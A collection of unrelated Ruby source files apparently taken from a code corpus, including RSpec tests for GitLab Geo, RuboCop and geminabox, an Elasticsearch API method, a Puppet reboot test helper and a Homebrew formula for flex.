allow(replicator).to receive(:verification_state_tracker).and_return(tracker)
allow(replicator).to receive(:calculate_checksum).and_return('abc123')
expect(tracker).to receive(:track_checksum_attempt!).and_yield
replicator.verify
end
end
describe '#verification_state_tracker' do
context 'on a Geo primary' do
before do
stub_primary_node
end
it 'returns model_record' do
expect(replicator.verification_state_tracker).to eq(model_record)
end
end
context 'on a Geo secondary' do
before do
stub_secondary_node
end
it 'returns registry' do
registry = double('registry')
allow(replicator).to receive(:registry).and_return(registry)
expect(replicator.verification_state_tracker).to eq(registry)
end
end
end
describe '#handle_after_checksum_succeeded' do
context 'on a Geo primary' do
before do
stub_primary_node
end
it 'creates checksum_succeeded event' do
expect { replicator.handle_after_checksum_succeeded }.to change { ::Geo::Event.count }.by(1)
expect(::Geo::Event.last.event_name).to eq 'checksum_succeeded'
end
it 'is called on verification success' do
model_record.verification_started
expect { model_record.verification_succeeded_with_checksum!('abc123', Time.current) }.to change { ::Geo::Event.count }.by(1)
expect(::Geo::Event.last.event_name).to eq 'checksum_succeeded'
end
end
context 'on a Geo secondary' do
before do
stub_secondary_node
end
it 'does not create an event' do
expect { replicator.handle_after_checksum_succeeded }.not_to change { ::Geo::Event.count }
end
end
end
describe '#consume_event_checksum_succeeded' do
context 'with a persisted model_record' do
before do
model_record.save!
end
context 'on a Geo primary' do
before do
stub_primary_node
end
it 'does nothing' do
expect(replicator).not_to receive(:registry)
replicator.consume_event_checksum_succeeded
end
end
context 'on a Geo secondary' do
before do
stub_secondary_node
end
context 'with a persisted registry' do
let(:registry) { replicator.registry }
before do
registry.save!
end
context 'with a registry which is verified' do
it 'sets state to verification_pending' do
registry.verification_started
registry.verification_succeeded_with_checksum!('foo', Time.current)
expect do
replicator.consume_event_checksum_succeeded
end.to change { registry.reload.verification_state }
.from(verification_state_value(:verification_succeeded))
.to(verification_state_value(:verification_pending))
end
end
context 'with a registry which is pending verification' do
it 'does not change state from verification_pending' do
registry.save!
expect do
replicator.consume_event_checksum_succeeded
end.not_to change { registry.reload.verification_state }
.from(verification_state_value(:verification_pending))
end
end
end
context 'with an unpersisted registry' do
it 'does not persist the registry' do
replicator.consume_event_checksum_succeeded
expect(replicator.registry.persisted?).to be_falsey
end
end
end
end
end
context 'integration tests' do
before do
model_record.save!
end
context 'on a primary' do
before do
stub_primary_node
end
describe 'background backfill' do
it 'verifies model records' do
expect do
Geo::VerificationBatchWorker.new.perform(replicator.replicable_name)
end.to change { model_record.reload.verification_succeeded? }.from(false).to(true)
end
end
describe 'triggered by events' do
it 'verifies model records' do
expect do
Geo::VerificationWorker.new.perform(replicator.replicable_name, replicator.model_record_id)
end.to change { model_record.reload.verification_succeeded? }.from(false).to(true)
end
end
end
context 'on a secondary' do
before do
stub_secondary_node
end
describe 'background backfill' do
it 'verifies registries' do
registry = replicator.registry
registry.start
registry.synced!
expect do
Geo::VerificationBatchWorker.new.perform(replicator.replicable_name)
end.to change { registry.reload.verification_succeeded? }.from(false).to(true)
end
end
describe 'triggered by events' do
it 'verifies registries' do
registry = replicator.registry
registry.save!
expect do
Geo::VerificationWorker.new.perform(replicator.replicable_name, replicator.model_record_id)
end.to change { registry.reload.verification_succeeded? }.from(false).to(true)
end
end
end
end
def verification_state_value(state_name)
model_record.class.verification_state_value(state_name)
end
end
| 30.552817 | 134 | 0.697188 |
61a70b830dd23c744bb8af3e07bfa4b2b7b2d486 | 457 | control 'verify the settings of all Azure Power BI Dataflows' do
impact 1.0
title 'Testing the singular resource of azure_power_bi_dataflow.'
desc 'Testing the singular resource of azure_power_bi_dataflow.'
describe azure_power_bi_dataflow(group_id: 'f089354e-8366-4e18-aea3-4cb4a3a50b48') do
it { should exist }
its('objectId') { should eq 'bd32e5c0-363f-430b-a03b-5535a4804b9b' }
its('name') { should eq 'AdventureWorks' }
end
end
| 35.153846 | 87 | 0.750547 |
e8ec490baf491f8124ed7caaad148822fef43fa9 | 379 | require "vcr"
VCR.configure do |config|
config.allow_http_connections_when_no_cassette = true
config.cassette_library_dir = "spec/vcr"
config.hook_into :webmock
config.ignore_localhost = true
config.configure_rspec_metadata!
config.default_cassette_options = { match_requests_on: [:method, :host], record: :new_episodes }
config.ignore_hosts "codeclimate.com"
end
| 31.583333 | 98 | 0.791557 |
bfa7890b2f302246f2252bf0479f02ddf5aeb8a7 | 3,045 | module Elasticsearch
module API
module Indices
module Actions
# Return the result of the analysis process (tokens)
#
# Allows to "test-drive" the Elasticsearch analysis process by performing the analysis on the
# same text with different analyzers. An ad-hoc analysis chain can be built from specific
# _tokenizer_ and _filters_.
#
# @example Analyze text "Quick Brown Jumping Fox" with the _snowball_ analyzer
#
# client.indices.analyze text: 'The Quick Brown Jumping Fox', analyzer: 'snowball'
#
# @example Analyze text "Quick Brown Jumping Fox" with a custom tokenizer and filter chain
#
# client.indices.analyze body: 'The Quick Brown Jumping Fox',
# tokenizer: 'whitespace',
# filters: ['lowercase','stop']
#
# @note If your text for analysis is longer than 4096 bytes then you should use the :body argument, rather than :text, to avoid HTTP transport errors
#
# @option arguments [String] :index The name of the index to scope the operation
# @option arguments [String] :body The text on which the analysis should be performed
# @option arguments [String] :analyzer The name of the analyzer to use
# @option arguments [String] :field Use the analyzer configured for this field
# (instead of passing the analyzer name)
# @option arguments [List] :filters A comma-separated list of filters to use for the analysis
# @option arguments [String] :index The name of the index to scope the operation
# @option arguments [Boolean] :prefer_local With `true`, specify that a local shard should be used if available,
# with `false`, use a random shard (default: true)
# @option arguments [String] :text The text on which the analysis should be performed
# (when request body is not used)
# @option arguments [String] :tokenizer The name of the tokenizer to use for the analysis
# @option arguments [String] :format Format of the output (options: detailed, text)
#
# @see http://www.elasticsearch.org/guide/reference/api/admin-indices-analyze/
#
def analyze(arguments={})
valid_params = [
:analyzer,
:field,
:filters,
:index,
:prefer_local,
:text,
:tokenizer,
:format ]
method = HTTP_GET
path = Utils.__pathify Utils.__listify(arguments[:index]), '_analyze'
params = Utils.__validate_and_extract_params arguments, valid_params
params[:filters] = Utils.__listify(params[:filters]) if params[:filters]
body = arguments[:body]
perform_request(method, path, params, body).body
end
end
end
end
end
| 46.846154 | 157 | 0.600328 |
1c2c80bb87f54b24112d00ec1087fa837b5abbb0 | 353 | RSpec.describe Magick::Pixel, '#alpha' do
it 'works' do
pixel = described_class.from_color('brown')
expect { pixel.alpha = 123 }.not_to raise_error
expect(pixel.alpha).to eq(123)
expect { pixel.alpha = 255.25 }.not_to raise_error
expect(pixel.alpha).to eq(255)
expect { pixel.alpha = 'x' }.to raise_error(TypeError)
end
end
| 29.416667 | 58 | 0.679887 |
911662c92336156a6afda537468c0727ae894a92 | 10,591 | # encoding: utf-8
require 'spec_helper'
describe RuboCop::Cop::Style::SpaceInsideBlockBraces do
SUPPORTED_STYLES = %w(space no_space)
subject(:cop) { described_class.new(config) }
let(:config) do
merged = RuboCop::ConfigLoader
.default_configuration['Style/SpaceInsideBlockBraces']
.merge(cop_config)
RuboCop::Config.new('Style/Blocks' => { 'Enabled' => false },
'Style/SpaceInsideBlockBraces' => merged)
end
let(:cop_config) do
{
'EnforcedStyle' => 'space',
'SupportedStyles' => SUPPORTED_STYLES,
'SpaceBeforeBlockParameters' => true
}
end
context 'with space inside empty braces not allowed' do
let(:cop_config) { { 'EnforcedStyleForEmptyBraces' => 'no_space' } }
it 'accepts empty braces with no space inside' do
inspect_source(cop, 'each {}')
expect(cop.messages).to be_empty
end
it 'accepts empty braces with line break inside' do
inspect_source(cop, [' each {',
' }'])
expect(cop.messages).to be_empty
end
it 'accepts empty braces with comment and line break inside' do
inspect_source(cop, [' each { # Comment',
' }'])
expect(cop.messages).to be_empty
end
it 'registers an offense for empty braces with space inside' do
inspect_source(cop, 'each { }')
expect(cop.messages).to eq(['Space inside empty braces detected.'])
expect(cop.highlights).to eq([' '])
end
it 'auto-corrects unwanted space' do
new_source = autocorrect_source(cop, 'each { }')
expect(new_source).to eq('each {}')
end
it 'does not auto-correct when braces are not empty' do
old_source = <<-END
a {
b
}
END
new_source = autocorrect_source(cop, old_source)
expect(new_source).to eq(old_source)
end
end
context 'with space inside empty braces allowed' do
let(:cop_config) { { 'EnforcedStyleForEmptyBraces' => 'space' } }
it 'accepts empty braces with space inside' do
inspect_source(cop, 'each { }')
expect(cop.messages).to be_empty
end
it 'registers an offense for empty braces with no space inside' do
inspect_source(cop, 'each {}')
expect(cop.messages).to eq(['Space missing inside empty braces.'])
expect(cop.highlights).to eq(['{}'])
end
it 'auto-corrects missing space' do
new_source = autocorrect_source(cop, 'each {}')
expect(new_source).to eq('each { }')
end
end
context 'with invalid value for EnforcedStyleForEmptyBraces' do
let(:cop_config) { { 'EnforcedStyleForEmptyBraces' => 'unknown' } }
it 'fails with an error' do
expect { inspect_source(cop, 'each { }') }
.to raise_error('Unknown EnforcedStyleForEmptyBraces selected!')
end
end
it 'accepts braces surrounded by spaces' do
inspect_source(cop, 'each { puts }')
expect(cop.messages).to be_empty
expect(cop.highlights).to be_empty
end
it 'accepts left brace without outer space' do
inspect_source(cop, 'each{ puts }')
expect(cop.highlights).to be_empty
end
it 'registers an offense for left brace without inner space' do
inspect_source(cop, 'each {puts }')
expect(cop.messages).to eq(['Space missing inside {.'])
expect(cop.highlights).to eq(['p'])
end
it 'registers an offense for right brace without inner space' do
inspect_source(cop, 'each { puts}')
expect(cop.messages).to eq(['Space missing inside }.'])
expect(cop.highlights).to eq(['}'])
expect(cop.config_to_allow_offenses).to eq('Enabled' => false)
end
it 'registers offenses for both braces without inner space' do
inspect_source(cop, ['a {}',
'b { }',
'each {puts}'])
expect(cop.messages).to eq(['Space inside empty braces detected.',
'Space missing inside {.',
'Space missing inside }.'])
expect(cop.highlights).to eq([' ', 'p', '}'])
# Both correct and incorrect code has been found in relation to
# EnforcedStyleForEmptyBraces, but that doesn't matter. EnforcedStyle can
# be changed to get rid of the EnforcedStyle offenses.
expect(cop.config_to_allow_offenses).to eq('EnforcedStyle' =>
'no_space')
end
it 'auto-corrects missing space' do
new_source = autocorrect_source(cop, 'each {puts}')
expect(new_source).to eq('each { puts }')
end
context 'with passed in parameters' do
it 'accepts left brace with inner space' do
inspect_source(cop, 'each { |x| puts }')
expect(cop.messages).to be_empty
expect(cop.highlights).to be_empty
end
it 'registers an offense for left brace without inner space' do
inspect_source(cop, 'each {|x| puts }')
expect(cop.messages).to eq(['Space between { and | missing.'])
expect(cop.highlights).to eq(['{|'])
end
it 'accepts new lambda syntax' do
inspect_source(cop, '->(x) { x }')
expect(cop.messages).to be_empty
end
it 'auto-corrects missing space' do
new_source = autocorrect_source(cop, 'each {|x| puts }')
expect(new_source).to eq('each { |x| puts }')
end
context 'and Blocks cop enabled' do
let(:config) do
RuboCop::Config.new('Style/Blocks' => { 'Enabled' => true },
'Style/SpaceInsideBlockBraces' => cop_config)
end
it 'does auto-correction for single-line blocks' do
new_source = autocorrect_source(cop, 'each {|x| puts}')
expect(new_source).to eq('each { |x| puts }')
end
it 'does not do auto-correction for multi-line blocks' do
# {} will be changed to do..end by the Blocks cop, and then this cop is
# not relevant anymore.
old_source = ['each {|x|',
' puts',
'}']
new_source = autocorrect_source(cop, old_source)
expect(new_source).to eq(old_source.join("\n"))
end
end
context 'and space before block parameters not allowed' do
let(:cop_config) do
{
'EnforcedStyle' => 'space',
'SupportedStyles' => SUPPORTED_STYLES,
'SpaceBeforeBlockParameters' => false
}
end
it 'registers an offense for left brace with inner space' do
inspect_source(cop, 'each { |x| puts }')
expect(cop.messages).to eq(['Space between { and | detected.'])
expect(cop.highlights).to eq([' '])
end
it 'accepts new lambda syntax' do
inspect_source(cop, '->(x) { x }')
expect(cop.messages).to be_empty
end
it 'auto-corrects unwanted space' do
new_source = autocorrect_source(cop, 'each { |x| puts }')
expect(new_source).to eq('each {|x| puts }')
end
it 'accepts left brace without inner space' do
inspect_source(cop, 'each {|x| puts }')
expect(cop.messages).to be_empty
expect(cop.highlights).to be_empty
end
end
end
context 'configured with no_space' do
let(:cop_config) do
{
'EnforcedStyle' => 'no_space',
'SupportedStyles' => SUPPORTED_STYLES,
'SpaceBeforeBlockParameters' => true
}
end
it 'accepts braces without spaces inside' do
inspect_source(cop, 'each {puts}')
expect(cop.messages).to be_empty
expect(cop.highlights).to be_empty
end
it 'registers an offense for left brace with inner space' do
inspect_source(cop, 'each { puts}')
expect(cop.messages).to eq(['Space inside { detected.'])
expect(cop.highlights).to eq([' '])
expect(cop.config_to_allow_offenses).to eq('Enabled' => false)
end
it 'registers an offense for right brace with inner space' do
inspect_source(cop, 'each {puts }')
expect(cop.messages).to eq(['Space inside } detected.'])
expect(cop.highlights).to eq([' '])
end
it 'registers offenses for both braces with inner space' do
inspect_source(cop, 'each { puts }')
expect(cop.messages).to eq(['Space inside { detected.',
'Space inside } detected.'])
expect(cop.highlights).to eq([' ', ' '])
expect(cop.config_to_allow_offenses).to eq('EnforcedStyle' =>
'space')
end
it 'accepts left brace without outer space' do
inspect_source(cop, 'each {puts}')
expect(cop.highlights).to be_empty
end
it 'auto-corrects unwanted space' do
new_source = autocorrect_source(cop, 'each{ puts }')
expect(new_source).to eq('each{puts}')
end
context 'with passed in parameters' do
context 'and space before block parameters allowed' do
it 'accepts left brace with inner space' do
inspect_source(cop, 'each { |x| puts}')
expect(cop.messages).to eq([])
expect(cop.highlights).to eq([])
end
it 'registers an offense for left brace without inner space' do
inspect_source(cop, 'each {|x| puts}')
expect(cop.messages).to eq(['Space between { and | missing.'])
expect(cop.highlights).to eq(['{|'])
end
it 'accepts new lambda syntax' do
inspect_source(cop, '->(x) {x}')
expect(cop.messages).to be_empty
end
it 'auto-corrects missing space' do
new_source = autocorrect_source(cop, 'each {|x| puts}')
expect(new_source).to eq('each { |x| puts}')
end
end
context 'and space before block parameters not allowed' do
let(:cop_config) do
{
'EnforcedStyle' => 'no_space',
'SupportedStyles' => SUPPORTED_STYLES,
'SpaceBeforeBlockParameters' => false
}
end
it 'registers an offense for left brace with inner space' do
inspect_source(cop, 'each { |x| puts}')
expect(cop.messages).to eq(['Space between { and | detected.'])
expect(cop.highlights).to eq([' '])
end
it 'accepts new lambda syntax' do
inspect_source(cop, '->(x) {x}')
expect(cop.messages).to be_empty
end
it 'auto-corrects unwanted space' do
new_source = autocorrect_source(cop, 'each { |x| puts}')
expect(new_source).to eq('each {|x| puts}')
end
end
end
end
end
| 33.305031 | 79 | 0.598055 |
26b5e5d1daa954da0538580d0f08fa0c8b84eb2e | 4,317 | require 'beaker-task_helper/inventory'
require 'bolt_spec/run'
require 'beaker-pe'
require 'beaker-puppet'
require 'beaker-rspec'
require 'beaker/puppet_install_helper'
require 'beaker/module_install_helper'
require 'beaker/testmode_switcher'
require 'beaker/testmode_switcher/dsl'
run_puppet_install_helper
configure_type_defaults_on(hosts)
install_module_dependencies_on(hosts)
proj_root = File.expand_path(File.join(File.dirname(__FILE__), '..'))
staging = { module_name: 'puppetlabs-reboot' }
local = { module_name: 'reboot', source: proj_root }
hosts.each do |host|
# Install Reboot Module Dependencies
on(host, puppet('module install puppetlabs-stdlib'))
on(host, puppet('module install puppetlabs-registry'))
# Install Reboot Module
# in CI allow install from staging forge, otherwise from local
install_dev_puppet_module_on(host, options[:forge_host] ? staging : local)
end
base_dir = File.dirname(File.expand_path(__FILE__))
RSpec.configure do |c|
# Skip tasks tests unless Bolt is available
c.filter_run_excluding(bolt: true) unless ENV['GEM_BOLT']
# Make modules available locally for Bolt
c.add_setting :module_path
c.module_path = File.join(base_dir, 'fixtures', 'modules')
end
require 'rubygems' # this is necessary for ruby 1.8
require 'puppet/version'
WINDOWS_SHUTDOWN_ABORT = 'cmd /c shutdown /a'.freeze
# Some versions of ruby and puppet improperly report exit codes
# due to a ruby bug the correct error code 1116, is returned modulo 256 = 92
WINDOWS_SHUTDOWN_NOT_IN_PROGRESS = [1116, 1116 % 256].freeze
def shutdown_pid(agent)
# code to get ps command taken from Facter 2.x implementation
# as Facter 3.x is dropping the ps fact
ps = case fact_on(agent, 'operatingsystem')
when 'OpenWrt'
'ps www'
when 'FreeBSD', 'NetBSD', 'OpenBSD', 'Darwin', 'DragonFly'
'ps auxwww'
else
'ps -ef'
end
# code to isolate PID adapted from Puppet service base provider
on(agent, ps).stdout.each_line do |line|
if line =~ %r{shutdown}
return line.sub(%r{^\s+}, '').split(%r{\s+})[1]
end
end
nil
end
def ensure_shutdown_not_scheduled(agent)
sleep 5
if windows_agents.include?(agent)
on agent, WINDOWS_SHUTDOWN_ABORT, acceptable_exit_codes: WINDOWS_SHUTDOWN_NOT_IN_PROGRESS
else
pid = shutdown_pid(agent)
if pid
on(agent, "kill #{pid}", acceptable_exit_codes: [0])
raise CommandFailure, "Host '#{agent}' had unexpected scheduled shutdown with PID #{pid}."
end
end
end
# If test is run on Debian 9 it does not seem possible to catch the shutdown command.
# As such code has beem implanted so that the loss of connection is caught instead.
def retry_shutdown_abort(agent, max_retries = 6)
sleep 55 if (fact('operatingsystem') =~ %r{SLES} && (fact('operatingsystemrelease') =~ %r{^15\.}))
i = 0
while i < max_retries
if windows_agents.include?(agent)
result = on(agent, WINDOWS_SHUTDOWN_ABORT, acceptable_exit_codes: [0, WINDOWS_SHUTDOWN_NOT_IN_PROGRESS].flatten)
elsif (fact('operatingsystem') =~ %r{RedHat} && fact('operatingsystemrelease') =~ %r{^8\.}) || # rubocop:disable Metrics/BlockNesting
(fact('operatingsystem') =~ %r{Debian} && fact('operatingsystemrelease') =~ %r{^9\.} || fact('operatingsystemrelease') =~ %r{^10\.})
(fact('operatingsystem') =~ %r{Ubuntu} && (fact('operatingsystemrelease') =~ %r{^16\.} || fact('operatingsystemrelease') =~ %r{^18\.}))
result = on(agent, "shutdown -c", acceptable_exit_codes: [0])
else
begin
pid = shutdown_pid(agent)
result = on(agent, "kill #{pid}", acceptable_exit_codes: [0]) if pid
rescue Beaker::Host::CommandFailure
break if (fact('operatingsystem') =~ %r{SLES} && (fact('operatingsystemrelease') =~ %r{^15\.}))
raise
end
end
break if result.exit_code == 0
warn("Reboot is not yet scheduled; sleeping for #{1 << i} seconds")
sleep 1 << i
i += 1
end
fail_test "Failed to abort shutdown on #{agent}" if i == max_retries
end
def windows_agents
agents.select { |agent| agent['platform'].include?('windows') }
end
def posix_agents
agents.reject { |agent| agent['platform'].include?('windows') }
end
def linux_agents
agents.select { |agent| fact_on(agent, 'kernel') == 'Linux' }
end
| 34.814516 | 145 | 0.699792 |
260b923a4adac556146d15ce53d81a49982f9d3a | 3,345 | require_relative '../../../test_helper'
require 'minitest/mock'
module Geminabox
module Proxy
class CopierTest < Minitest::Test
def setup
clean_data_dir
end
def test_remote_content_failure
raise_stub = proc { puts caller.join("\n") ; raise }
copier.stub :remote_content, raise_stub do
begin
copier.get_remote
rescue
end
assert(!File.exists?(copier.proxy_path), "Cached file should not exist")
end
end
def test_with_no_files_in_place
assert_equal false, copier.local_file_exists?
assert_equal false, copier.proxy_file_exists?
end
def test_with_local_in_place
create_local
assert_equal true, copier.local_file_exists?
assert_equal false, copier.proxy_file_exists?
end
def test_with_proxy_in_place
create_proxy
assert_equal false, copier.local_file_exists?
assert_equal true, copier.proxy_file_exists?
end
def test_copy_from_local
create_local
Copier.copy(test_file)
assert_proxy_file_present
assert_equal local_content, proxy_file_content
end
def test_copy_with_proxy_and_local
create_local
create_proxy
Copier.copy(test_file)
assert_equal proxy_content, proxy_file_content
end
def test_copy_with_just_proxy
create_proxy
Copier.copy(test_file)
assert_equal proxy_content, proxy_file_content
end
def test_copy_with_neither_local_nor_proxy
create_remote
Copier.copy(test_file)
assert_proxy_file_present
assert_equal remote_content, proxy_file_content
end
def test_copy_with_sub_directory
@test_file = 'sub_directory/co-pier_test.txt'
test_with_local_in_place
end
private
def copier
@copier ||= Copier.new(test_file)
end
def create_local_file
File.open(file_path(locator.local_path), 'w'){|f| f.write(new_content)}
end
def file_path(path)
File.expand_path(test_file, path)
end
def test_file
@test_file ||= 'copier_test.txt'
end
def locator
@locator ||= FileHandler.new test_file
end
def local_content
@local_content ||= this_is_a :local
end
def proxy_content
@proxy_content ||= this_is_a :proxy
end
def remote_content
@remote_content ||= this_is_a :remote
end
def this_is_a(type)
"This is a #{type} file"
end
def create_local
locator.local_path
File.open(locator.local_path, 'w+'){|f| f.write(local_content)}
end
def create_proxy
File.open(locator.proxy_path, 'w+'){|f| f.write(proxy_content)}
end
def create_remote
stub_request_for_remote
end
def stub_request_for_remote
stub_request(:get, "http://rubygems.org/#{test_file}").
to_return(:status => 200, :body => remote_content)
end
def proxy_file_content
File.read(locator.proxy_path)
end
def assert_proxy_file_present
assert copier.proxy_file_exists?, "#{locator.proxy_folder_name}/#{test_file} should be present"
end
end
end
end
| 24.23913 | 103 | 0.64006 |
f855de3282cc037dd8de3f460b5fdcf091e1e668 | 5,131 | # encoding: utf-8
require "spec_helper"
require "fileutils"
require "tempfile"
module Bunch
describe FileCache do
let(:input_1) { FileTree.from_hash("a" => "1", "b" => "2") }
let(:input_2) { FileTree.from_hash("a" => "1", "b" => "3") }
let(:result_1) { FileTree.from_hash("a" => "!", "b" => "@") }
let(:result_2) { FileTree.from_hash("a" => "!", "b" => "#") }
let(:result_3) { FileTree.from_hash("a" => "%", "b" => "#") }
let(:processor_1) { stub new: stub(result: result_1), to_s: "processor" }
let(:processor_2) { stub new: stub(result: result_2), to_s: "processor" }
let(:processor_3) { stub new: stub(result: result_3), to_s: "processor" }
let(:processor_4) { stub new: stub(result: result_3), to_s: "grocessor" }
def new_cache(processor, path = "a_path")
FileCache.new(processor, path)
end
before do
FileUtils.rm_rf ".bunch-cache"
end
it "delegates to the underlying processor on a cold cache" do
new_cache(processor_1).new(input_1).result.must_equal result_1
end
it "returns the same results for the same input" do
new_cache(processor_1).new(input_1).result.must_equal result_1
new_cache(processor_2).new(input_1).result.must_equal result_1
end
it "returns different results for a different input" do
new_cache(processor_1).new(input_1).result.must_equal result_1
new_cache(processor_2).new(input_2).result.must_equal result_2
end
it "only updates paths that have changed" do
new_cache(processor_1).new(input_1).result.must_equal result_1
new_cache(processor_3).new(input_2).result.must_equal result_2
end
it "maintains distinct caches for different processors" do
new_cache(processor_1).new(input_1).result.must_equal result_1
new_cache(processor_4).new(input_1).result.must_equal result_3
end
it "maintains distinct caches for different input paths" do
new_cache(processor_1).new(input_1).result.must_equal result_1
new_cache(processor_2).new(input_1).result.must_equal result_1
new_cache(processor_2, "abc").new(input_1).result.must_equal result_2
end
it "considers the cache expired if Bunch's version changes" do
new_cache(processor_1).new(input_1).result.must_equal result_1
begin
FileCache::VERSION = "alsdkjalskdj"
new_cache(processor_2).new(input_1).result.must_equal result_2
ensure
FileCache.send :remove_const, :VERSION
end
end
end
class FileCache
describe Partition do
let(:empty) { FileTree.from_hash({}) }
let(:tree_1) { FileTree.from_hash("a" => {"b" => "1", "c" => "2"}) }
it "returns input tree for pending if cache is empty" do
cache = stub
cache.stubs(:read).returns(nil)
partition = Partition.new(tree_1, cache)
partition.process!
partition.cached.must_equal empty
partition.pending.must_equal tree_1
end
it "divides input tree into pending and cached" do
cache = stub
cache.stubs(:read).with("a/b", "1").returns("cache")
cache.stubs(:read).with("a/c", "2").returns(nil)
partition = Partition.new(tree_1, cache)
partition.process!
partition.cached.must_equal FileTree.from_hash("a" => {"b" => "cache"})
partition.pending.must_equal FileTree.from_hash("a" => {"c" => "2"})
end
end
describe Cache do
def create_cache
Cache.from_trees(
FileTree.from_hash("a" => "1", "b" => { "c" => "2" }),
FileTree.from_hash("a" => "!", "b" => { "c" => "@" }))
end
def assert_cache_is_correct(cache)
cache.read("a", "1").must_equal "!"
cache.read("a", "2").must_equal nil
cache.read("b/c", "2").must_equal "@"
cache.read("b/c/d", "2").must_equal nil
cache.read("b/d", "2").must_equal nil
end
it "records a mapping between two trees" do
cache = create_cache
assert_cache_is_correct cache
end
it "saves to and loads from a file" do
original_cache = create_cache
loaded_cache = nil
Tempfile.open(["cache", ".yml"]) do |tempfile|
tempfile.close
original_cache.write_to_file(tempfile.path)
loaded_cache = Cache.read_from_file(tempfile.path)
end
assert_cache_is_correct loaded_cache
end
it "returns a null cache if the file can't be opened" do
Cache.read_from_file("asldkasd").must_be_instance_of Cache
end
describe "#read" do
before do
@cache = Cache.new(
{ "a" => Digest::MD5.hexdigest("1") },
FileTree.from_hash("a" => "!@#")
)
end
it "returns the result if the hash matches" do
@cache.read("a", "1").must_equal "!@#"
end
it "returns nil if the hash doesn't match" do
@cache.read("a", "2").must_equal nil
end
it "returns nil if the file isn't present" do
@cache.read("b", "1").must_equal nil
end
end
end
end
end
| 33.756579 | 79 | 0.620737 |
f75f997df9c62653c53f8cfd33941513d30c21a9 | 2,145 | class Flex < Formula
desc "Fast Lexical Analyzer, generates Scanners (tokenizers)"
homepage "https://github.com/westes/flex"
url "https://github.com/westes/flex/releases/download/v2.6.4/flex-2.6.4.tar.gz"
sha256 "e87aae032bf07c26f85ac0ed3250998c37621d95f8bd748b31f15b33c45ee995"
revision 1
bottle do
sha256 "902e2701bb4d8130fe3177211dda84b6ebc6a520467874a52bcd7ff043b949cc" => :catalina
sha256 "2051ed8f0de322732b111f2cc82069e82f6dfd4d839e6d098bbebcd7f92220e6" => :mojave
sha256 "9c224c27a3d40a53b6f778a6b825f8b4f14654080b144e50f1bec9cc608c757d" => :high_sierra
sha256 "a958106ee0895b21c7577478b847ecdbc601ce6a723543c5da455bfe0eee5f8f" => :sierra
sha256 "d96d0062e78529ae5a0ff049eeaf1216df4a5e47f2fbda680473b48b15f59d1a" => :x86_64_linux
end
head do
url "https://github.com/westes/flex.git"
depends_on "autoconf" => :build
depends_on "automake" => :build
# https://github.com/westes/flex/issues/294
depends_on "gnu-sed" => :build
depends_on "libtool" => :build
end
keg_only :provided_by_macos, "some formulae require a newer version of flex"
depends_on "help2man" => :build
depends_on "gettext"
unless OS.mac?
depends_on "m4"
depends_on "bison" => :build
end
def install
if build.head?
ENV.prepend_path "PATH", Formula["gnu-sed"].opt_libexec/"gnubin"
system "./autogen.sh"
end
system "./configure", "--disable-dependency-tracking",
"--disable-silent-rules",
"--enable-shared",
"--prefix=#{prefix}"
system "make", "install"
bin.install_symlink "flex" => "lex" unless OS.mac?
end
test do
(testpath/"test.flex").write <<~EOS
CHAR [a-z][A-Z]
%%
{CHAR}+ printf("%s", yytext);
[ \\t\\n]+ printf("\\n");
%%
int main()
{
yyin = stdin;
yylex();
}
EOS
system "#{bin}/flex", "test.flex"
system ENV.cc, "lex.yy.c", "-L#{lib}", "-lfl", "-o", "test"
assert_equal shell_output("echo \"Hello World\" | ./test"), <<~EOS
Hello
World
EOS
end
end
| 29.383562 | 94 | 0.642424 |
ed29909b90008da63ac76fedd9d7a8abf0d65d2b | 3,243 | # frozen_string_literal: true
require 'json'
module Saharspec
module Matchers
# @private
class BeJson
include RSpec::Matchers::Composable
include RSpec::Matchers # to have #match
ANY = Object.new.freeze
attr_reader :actual, :expected
def initialize(expected, **parse_opts)
@expected_matcher = @expected = expected
# wrap to make be_json('foo' => matcher) work, too
unless expected == ANY || expected.respond_to?(:matches?)
@expected_matcher = match(expected)
end
@parse_opts = parse_opts
end
def matches?(json)
@actual = JSON.parse(json, **@parse_opts)
@expected_matcher == ANY || @expected_matcher === @actual
rescue JSON::ParserError => e
@parser_error = e
false
end
def does_not_match?(*args)
!matches?(*args)
end
def diffable?
true
end
def description
if @expected == ANY
'be a valid JSON string'
else
expected = @expected.respond_to?(:description) ? @expected.description : @expected
"be a valid JSON matching (#{expected})"
end
end
def failure_message
failed =
case
when @parser_error
"failed: #{@parser_error}"
when @expected != ANY
"was #{@actual}"
end
"expected value to #{description} but #{failed}"
end
def failure_message_when_negated
'expected value not to be parsed as JSON, but succeeded'
end
end
end
end
module RSpec
module Matchers
# `be_json` checks if provided value is JSON, and optionally checks it contents.
#
# If you need to check against some hashes, it is more convenient to use `be_json_sym`, which
# parses JSON with `symbolize_names: true`.
#
# @example
#
# expect('{}').to be_json # ok
# expect('garbage').to be_json
# # expected value to be a valid JSON string but failed: 765: unexpected token at 'garbage'
#
# expect('{"foo": "bar"}').to be_json('foo' => 'bar') # ok
# expect('{"foo": "bar"}').to be_json_sym(foo: 'bar') # more convenient
#
# expect('{"foo": [1, 2, 3]').to be_json_sym(foo: array_including(3)) # nested matchers work
# expect(something_large).to be_json_sym(include(meta: include(next_page: Integer)))
#
# @param expected Value or matcher to check JSON against. It should implement `#===` method,
# so all standard and custom RSpec matchers work.
def be_json(expected = Saharspec::Matchers::BeJson::ANY)
Saharspec::Matchers::BeJson.new(expected)
end
# `be_json_sym` checks if value is a valid JSON and parses it with `symbolize_names: true`. This
# way, it is convenient to check hashes content with Ruby's short symbolic keys syntax.
#
# See {#be_json_sym} for examples.
#
# @param expected Value or matcher to check JSON against. It should implement `#===` method,
# so all standard and custom RSpec matchers work.
def be_json_sym(expected = Saharspec::Matchers::BeJson::ANY)
Saharspec::Matchers::BeJson.new(expected, symbolize_names: true)
end
end
end
| 30.59434 | 100 | 0.618871 |
6271afa3168b2048683bb76487507edac6319964 | 526 | Gem::Specification.new do |s|
s.name = "shibe"
s.version = "1.0.0"
s.summary = "very Cuba"
s.description = "Wow Shibe, Such Doge, very Cuba"
s.authors = ["elcuervo"]
s.licenses = ["MIT", "HUGWARE"]
s.email = ["yo@brunoaguirre.com"]
s.homepage = "http://github.com/elcuervo/shibe"
s.files = `git ls-files`.split("\n")
s.test_files = `git ls-files test`.split("\n")
s.add_dependency("cuba", "~> 3.1.0")
end
| 35.066667 | 58 | 0.505703 |
218fbffaadbabb8f962374bfd9f77d84df0bceec | 1,303 |
lib = File.expand_path("../lib", __FILE__)
$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
require "bitrix_webhook/version"
